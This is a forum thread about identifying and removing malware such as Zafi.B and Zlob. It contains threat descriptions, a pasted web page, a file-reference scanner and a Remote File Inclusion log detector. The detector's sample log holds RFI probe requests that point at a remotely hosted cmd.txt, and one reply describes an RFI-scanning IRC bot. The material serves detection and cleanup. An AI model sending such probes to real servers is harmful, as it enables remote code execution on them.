VIruses........
Win32.Zafi.B trojan monitors, files, networks.
Trojan.Zlob
Spyware.C
Hacktool.D
Dialer.Lox
PackedMassAccess
Spyware.Nod17
Anyone know what these are and how to remove them without any antivirus?
See through the master
Become the master
PaRaDoX
BerryTheWest wrote:
Do a program vs program.
But I have to know where to get them so I can study their movement and tactic.
Basically Anti-virus does it for you.

feh, some like to trick antivirus quarantines, which then tell you it's quarantined when it's not. i prefer to use antivirus to tell me where it is, then kill its process and delete it manually. and if a program is calling it (meaning it just restarts when you end it), search for it as part of the file content and usually that turns up the pesky file calling it. then you can easily end it using task manager and delete it manually (since you can't delete it while running). or you can be lazy and use a batch :3
~You are a glitch in my reasoning.
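The "search for it as part of the file content" step from the post above, as an added example that is not from the thread or any of its posters: a small Python scanner that walks a directory tree and reports every file whose contents mention a given file name. Windows binaries, shortcuts, scheduled-task XML and registry exports commonly store strings as UTF-16LE, so a plain ASCII search misses many launchers; this one checks both encodings, case-insensitively. The file name `sfx.exe` and the sample files are constructed for the demo.

```python
"""Find files that mention a given file name (added example, not from the thread).

When a killed process keeps coming back, the thing that restarts it is usually
a script, shortcut, task definition or config that names it. This walks a tree
and searches file contents for that name as UTF-8 and as UTF-16LE, since Windows
tooling stores many strings as wide characters. Matching is case-insensitive,
as Windows file names are.
"""
import os
import tempfile


def patterns_for(name: str) -> list[bytes]:
    """Byte patterns to look for: the lowercased name as UTF-8 and as UTF-16LE."""
    if not name:
        raise ValueError("name must not be empty")
    return [name.lower().encode("utf-8"), name.lower().encode("utf-16-le")]


def file_references(path: str, name: str, chunk: int = 1 << 20) -> bool:
    """True if any encoding of `name` appears in the file at `path`.

    Reads in chunks and keeps an overlap from the previous chunk so a match that
    straddles a chunk boundary is still found. Unreadable files (locked, access
    denied) count as non-matching rather than aborting the whole scan.
    """
    patterns = patterns_for(name)
    overlap = max(len(p) for p in patterns) - 1
    tail = b""
    try:
        with open(path, "rb") as fh:
            while True:
                data = fh.read(chunk)
                if not data:
                    return False
                buf = (tail + data).lower()   # bytes.lower() only touches ASCII letters
                if any(p in buf for p in patterns):
                    return True
                tail = buf[-overlap:]
    except OSError:
        return False


def find_referrers(root: str, name: str) -> list[str]:
    """Walk `root` and return paths of files whose contents mention `name`.

    A file that merely has that name is skipped: we want whatever points at it.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower() == name.lower():
                continue
            full = os.path.join(dirpath, fn)
            if file_references(full, name):
                hits.append(full)
    return sorted(hits)


def demo() -> list[str]:
    """Search a constructed directory tree (sample files, not real malware)."""
    with tempfile.TemporaryDirectory() as root:
        sub = os.path.join(root, "sub")
        os.mkdir(sub)
        samples = {
            "launcher.bat": b"@echo off\r\nstart sfx.exe\r\n",          # ASCII reference
            "settings.dat": "C:\\Temp\\SFX.EXE".encode("utf-16-le"),    # UTF-16LE, other case
            "readme.txt": b"nothing to see here\r\n",                    # no reference
            "sfx.exe": b"MZ" + b"\x00" * 64,                             # the file itself, skipped
        }
        for fn, content in samples.items():
            with open(os.path.join(root, fn), "wb") as fh:
                fh.write(content)
        with open(os.path.join(sub, "task.xml"), "wb") as fh:           # nested directory
            fh.write("<Command>sfx.exe</Command>".encode("utf-16-le"))
        return [os.path.relpath(p, root) for p in find_referrers(root, "sfx.exe")]


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Run it against the directories the antivirus named, plus the Startup folders and any exported registry hives. A launcher that lives only in a registry Run key or a service entry will not show up as a file hit, so pair this with a look at autostart locations before deleting anything.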
PaRaDoX wrote:
BerryTheWest wrote:
Do a program vs program.
But I have to know where to get them so I can study their movement and tactic.
Basically Anti-virus does it for you.

feh, some like to trick antivirus quarantines, which then tell you it's quarantined when it's not. i prefer to use antivirus to tell me where it is, then kill its process and delete it manually. and if a program is calling it (meaning it just restarts when you end it), search for it as part of the file content and usually that turns up the pesky file calling it. then you can easily end it using task manager and delete it manually (since you can't delete it while running). or you can be lazy and use a batch :3

Well, sometimes it is within a Top Level class virus that you cannot delete, since it is read-only after you reset the computer. So they usually do an injection into a DLL or any other files across the system directory, and if you delete a file from the System directory, your computer is dead.
The Assistant of the Clan. The White Orders.
I asked the site creator if he needed moderators, and I was shocked when I got a reply, but he was stating they don't need any mods. :S.
Anyone able to..ethically.. for the greater good of hacker.org, able to use an sql injection and gain entry?
Just kidding.
See through the master
Become the master
Re: VIruses........
S3th wrote:
Win32.Zafi.B trojan monitors, files, networks.
Trojan.Zlob
Spyware.C
Hacktool.D
Dialer.Lox
PackedMassAccess
Spyware.Nod17
Anyone know what these are and how to remove them without any antivirus?

What is Win32.Zafi.B
Win32/Zafi.B is a worm spreading via e-mail and P2P networks.
Zafi.B worm is a moderately destructive worm that may cause antivirus and security products to stop working. It also may overwrite executables of installed security products. Zafi also disables RegEdit, MSconfig and the Task Manager and may also launch a DoS attack against several Hungarian web sites.
You can search your computer manually yourself.
Trojan.Zlob.B is a Trojan horse that opens a back door and allows a remote attacker to perform various actions on the compromised computer.
Threat Assessment
Wild
  Wild Level: Low
  Number of Infections: 0 - 49
  Number of Sites: 0 - 2
  Geographical Distribution: Low
  Threat Containment: Easy
  Removal: Easy
Damage
  Damage Level: Medium
Distribution
  Distribution Level: Low
Spyware.C
sfx.exe content:
<SCRIPT language="javascript" src="http://lads.yousendit.com/mirror/YSImir ... "></SCRIPT>
<center>
<html> <script src="/__utm.js" type="text/javascript"></script> <head> <meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>YouSendIt: The Leader in File Delivery.</title>
<link href="site.css" rel="STYLESHEET" type="text/css">
<script LANGUAGE="JavaScript">
<!-- Begin
image1 = new Image();
image1.src = "images/b_services1.jpg";
image2 = new Image();
image2.src = "images/b_solutions1.jpg";
image3 = new Image();
image3.src = "images/b_support1.jpg";
image4 = new Image();
image4.src = "images/b_company1.jpg";
// End -->
</script>
<script type="text/javascript">
var randnum = Math.random();
var inum = 11;
// Change this number to the number of images you are using.
var rand1 = Math.round(randnum * (inum-1)) + 1;
images = new Array
images[1] = "images/top1.jpg"
images[2] = "images/top2.jpg"
images[3] = "images/top3.jpg"
images[4] = "images/top4.jpg"
images[5] = "images/top5.jpg"
images[6] = "images/top6.jpg"
images[7] = "images/top7.jpg"
images[8] = "images/top8.jpg"
images[9] = "images/top9.jpg"
images[10] = "images/top10.jpg"
images[11] = "images/top11.jpg"
// Ensure you have an array item for every image you are using.
var image = images[rand1]
</script>
</head>
<BODY bgcolor="#ffffff" id="body1" scroll="yes">
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td rowspan="32" align="top" width="210"><a href="http://www.yousendit.com"><img src="images/ysi_logo_frontpage.jpg" border="0"></a></td>
<td width="518" colspan="2">
<script language="javascript">
<!--
document.write('<img src="'+image+'">')
-->
</script>
</td>
</tr>
<tr>
<td class="smallGrey" align="right">Delivering over 43,973,865,717,760 bytes per day | <strong>What are you sending?</strong></td>
<td><img src="images/dot.gif" width="8" height="8"></td>
</tr>
</table>
</td>
</tr>
<tr><td height="7"></td></tr> <!-- space between "transferring" and blue nav bar -->
</table>
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td width="728" height="19" bgcolor="#3366cc" align="right" class="content"><a class="white" href="community.aspx"> YSI Community </a><a class="white" href="solutions.aspx">| Business Solutions </a><a class="white" href="advertise.aspx">| Advertise </a></td>
</tr>
<tr>
<td colspan="2" height="3"></td> <!-- space between blue nav bar and content of page -->
</tr>
</table>
<span class="content"><font size="-2" align="left">A D V E R T I S E M E N T - Clicking this advertisement will not affect download.</font></span><br>
<iframe src="dart/expired 728x90.aspx" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
<table cellpadding="0" cellspacing="0" width="728" height="300" bgcolor="#ffffff" border="0">
<tr>
<td class="content" align="left" width="167">
<table width="100%" height="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td width="20"></td>
<td width="*" align="left" valign="top">
<a href="howdoesitwork.aspx" class="currentpage"><br><br><br>
<img src="images/arrow_sm.jpg" border="0">How does it work?</a><br>
<a href="whyyousendit.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Why YouSendIt?</a><br>
<a href="abuse.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Report Abuse</a><br>
<a href="community.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Get Involved!</a><br><br>
</td>
<!-- <td width="10" background="images/greenLine10.gif"><img src="images/dot.gif" width="10"></td> -->
</tr>
</table>
</td>
<td class="content" width="561" valign="top"><br>
<table cellpadding="0" cellspacing="0" height="250" border="0">
<tr>
<td width="10" background="images/greenLine10.gif"><img src="images/dot.gif" width="10"></td>
<td width="205" class="content_bigger" valign="top">
<font class="subtitle">Your file has expired.</font><br><br>
Unfortunately, your file has expired. A link is valid
for 7 days or a limited number of downloads, whichever occurs first.<br><br>
Once the link expires, the file is deleted and
cannot be recovered.
</td>
<td width="10"></td>
<td width="336" valign="top">
<center>
<font size="-2">ADVERTISEMENT - Clicking will not affect download.</font><br>
<iframe src="dart/expired 300x250.aspx" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
</center>
</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<span class="content"><font size="-2" align="left">A D V E R T I S E M E N T - Clicking this advertisement will not affect download.</font></span><br>
<!-- Begin BidClix Code -->
<script language="javascript" type="text/javascript">
<!--
document.write('<s'+'cript src="http://ads.bidclix.com/code/64469/?cb='+
(new Function
("var d=new Date();var u=Date.UTC(d.getUTCFul"
+"lYear(),d.getUTCMonth(),d.getUTCDay(),d.get"
+"UTCHours(),d.getUTCMinutes(),d.getUTCSecond"
+"s(),d.getUTCMilliseconds());return u+'-'+Ma"
+"th.random();"
))()
+'"><'+'/script>');
// -->
</script>
<noscript>
<iframe src="http://ads.bidclix.com/serve-page/?id=64469" width="740" height="125" scrolling="no" frameBorder="0">
<a href="http://ads.bidclix.com/serve-link/?id=64469" target="_blank"><img src="http://ads.bidclix.com/serve-image/?id=64469" width="740" height="125" border="0" alt="" /></a>
</iframe>
</noscript>
<!-- End BidClix Code -->
<table cellpadding="2" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr align="center">
<td colspan="2" align="center">
<hr noshade color="#CCCCCC" size="1">
</td>
</tr>
<tr height="19">
<td class="smallGreen" align="left"><strong>YouSendIt</strong> © 2005</td>
<td width="555" bgcolor="#7FC31C" align="right" class="content"> <a class="white" href="privacy.aspx">Privacy Policy | </a> <a class="white" href="tos.aspx">Terms of Service | </a> <a class="white" href="dmca.aspx">DMCA Policy</a> <a href="company.aspx" class="white"> | Company </a><a href="support.aspx" class="white">| Support </a></td>
</tr>
</table>
<!-- BEGIN DART -->
<script language="Javascript">
<!--
var axel = Math.random() + "";
var ord = axel * 1000000000000000000;
//-->
</script>
<SCRIPT LANGUAGE="JavaScript">
document.write('<SCRIPT LANGUAGE="JavaScript1.1" SRC="https://ad.doubleclick.net/adj/expired. ... sect=;ord=' + ord + '?" ><\/SCRIPT>');
</SCRIPT>
<SCRIPT>
if ((!document.images && navigator.userAgent.indexOf("Mozilla/2.") >= 0) || navigator.userAgent.indexOf("WebTV")>= 0) {
document.write('<A HREF="https://ad.doubleclick.net/jump/expired ... sect=;ord=' + ord + '?" TARGET="_blank">');
document.write('<IMG SRC="https://ad.doubleclick.net/ad/expired.y ... sect=;ord=' + ord + '?" WIDTH="1" HEIGHT="1" BORDER="0" ALT=""></A>');
}
</SCRIPT>
<NOSCRIPT>
<A HREF="https://ad.doubleclick.net/jump/expired ... =123456789?" TARGET="_blank">
<IMG SRC="https://ad.doubleclick.net/ad/expired.y ... =123456789?" WIDTH="1" HEIGHT="1" BORDER="0" ALT=""></A>
</NOSCRIPT>
<!-- END DART -->
<iframe src="http://a.as-us.falkag.net/dat/dlv/aslfr ... =0&mod=111" width="1" height="1" scrolling="no" frameBorder="0"></iframe>
</body>
</html>
Technical details
This malicious program is a hacking utility. It is a Perl script. The size of infected files may vary from 12KB to 69KB.
Payload
This script is an IRC bot which is used to search for Remote File Inclusion (RFI) vulnerabilities.
Depending on the commands received, the bot can:
- wipe log files
- search for sites with RFI vulnerabilities. In order to find a site, the bot is given a keyword. It then uses the keyword with the following search services:
  http://www.google.nl
  http://busca.uol.com.br
  http://www.alltheweb.com
  http://it.ask.com
  http://search.aol.com
  http://suche.fireball.de
  http://search.lycos.com
  http://arianna.libero.it
  http://search.yahoo.com
  http://search.live.com
If sites are found which contain the substrings "buterfly" and "uid=" in the address, the malicious program creates a request which redirects the address to the following link:
http://linknet*****.com/source/cmd.txt?
The contents of this file will then be run on the site's web server. This provides the remote malicious user with access to the server.
The script also contains the following string:
Yogya Ceria Scaner Bot Created By eviL-Zone -= evil =-
Delete the original malicious program file (the location will depend on how the program originally penetrated the victim machine).
Dialer.Lox
An updated TrojanHunter ruleset, containing 27639 ruleset entries, is available. This update adds 5 new trojan definitions:
I hope this gave you the answer to your question. And sorry, I couldn't get information on PackedMassAccess.
Spyware.Nod17
Sorry.
TREADER
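The Hacktool.D description in the reply above says the bot finds vulnerable sites by search engine and then requests them with the URL of a remotely hosted script in the address, so the page includes it. From the web server's side, that probe is visible in the access log as a request whose query parameter value is itself an absolute URL to some other host. The following detector is an added example, not from the thread or from any vendor write-up; it parses Combined Log Format lines and flags that pattern. The log lines, the IP addresses (RFC 5737 test ranges) and the hostname `www.example.org` are all constructed for the demo.

```python
"""Flag Remote File Inclusion (RFI) probes in web server access logs.

Added example (not from the thread). An RFI probe puts the URL of a remotely
hosted script into a query parameter, e.g. ?page=http://host/cmd.txt? ; the
trailing '?' turns whatever the vulnerable include appends into a query
string. The detector reports parameter values that are absolute URLs to a
host other than our own, after URL-decoding them.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined Log Format: src ident user [time] "METHOD target HTTP/x" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
URL_RE = re.compile(r'(?:https?|ftp)://([^/\s?#]+)', re.IGNORECASE)

# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2009:12:01:02 +0000] "GET /index.php?page=http://203.0.113.99/source/cmd.txt? HTTP/1.1" 200 1043 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [10/Mar/2009:12:01:03 +0000] "GET /gallery/view.php?uid=42&inc=http%3A%2F%2F203.0.113.99%2Fcmd.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [10/Mar/2009:12:02:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2009:12:02:11 +0000] "GET /login.php?next=http://www.example.org/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]


def rfi_params(target: str, own_host: str) -> list[tuple[str, str]]:
    """Return (param, value) pairs whose value is an absolute URL on a foreign host.

    parse_qsl already decodes one layer of percent-encoding; unquote() handles
    a second layer so double-encoded payloads are not missed. Links back to our
    own host (redirect targets and the like) are left alone.
    """
    hits = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)
        m = URL_RE.search(decoded)
        if m and m.group(1).lower() != own_host.lower():
            hits.append((key, decoded))
    return hits


def scan_log(lines, own_host: str) -> list[tuple[str, str, str, str]]:
    """Return (source_ip, path, param, value) for every line carrying an RFI-style payload.

    Lines that do not match the log format are skipped rather than raising.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("target").split("?", 1)[0]
        for key, value in rfi_params(m.group("target"), own_host):
            findings.append((m.group("src"), path, key, value))
    return findings


if __name__ == "__main__":
    for src, path, key, value in scan_log(SAMPLE_LOG, "www.example.org"):
        print(f"{src} -> {path} [{key}={value}]")
```

The second sample line carries the `uid=` parameter the bot's search dork looks for; the detector ignores it and flags only `inc`, whose value is a foreign URL. On the server side, the fix that makes such probes harmless is to never pass request input to `include`/`require` unfiltered: resolve page names against a fixed allowlist, and in PHP keep `allow_url_include` off so a remote URL cannot be included at all.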